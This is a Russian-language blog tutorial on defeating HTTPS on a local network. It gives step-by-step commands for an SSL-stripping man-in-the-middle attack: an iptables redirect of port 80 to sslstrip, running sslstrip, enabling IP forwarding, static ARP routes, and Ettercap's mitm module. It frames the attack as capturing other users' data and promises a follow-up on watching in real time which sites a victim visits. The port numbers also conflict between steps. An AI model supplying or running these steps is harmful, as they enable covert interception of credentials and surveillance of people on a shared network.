https-obhod-v

Обход зашифрованного протокола Https

unnamed

Как и было мною обещано сейчас я расскажу вам как подменить тип шифрования дабы Ettercap смог понять что он отобрал для нас и не выкинул эту инфу.

Как раз для этого мы используем в тондеме с Ettercap(И его модулем mitm) новую програмку Ssl_Strip и IPtables.

Ssl_Strip как и IPtables не имеют графического интерфейса и по этому обычные пользователи предпочитают их не замечать, но мы не обычные,уже…

Настраиваем IPtables для перенаправления интернет трафика. С 80 порта на любой другой, у меня это 5050 порт :
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 5050

Ну а теперь врубаем SSLstrip sslstrip -l  5050

Включаем форвардинг ip-forwarding пакетов:
echo «1» > /proc/sys/net/ipv4/ip_forward


Запускаем SSLstrip на просушку заданного нами порта:
sslstrip -l 8080
Убедитесь что вы не запустили через этот порт и другие «программы для поиска уезвимостей своих интернет сетей»

Создаем статический маршрут.
Два варианта:
Первый Вариант
arp -s 192.168.1.1 xx-xx-xx-xx-xx-xx

Второй вариант
Если первый не сработал то вот второй вариант:
netsh interface ipv4 add neighbors «Подключение по локальной сети» «192.168.1.1» «xx-x-xx-xx-xx-xx»

Ettercap

В следующей части я научу вас подсматривать за тем на какие сайты заходит пользователь в реальном времени

Добавить комментарий

Сообщить об опечатке

Текст, который будет отправлен нашим редакторам: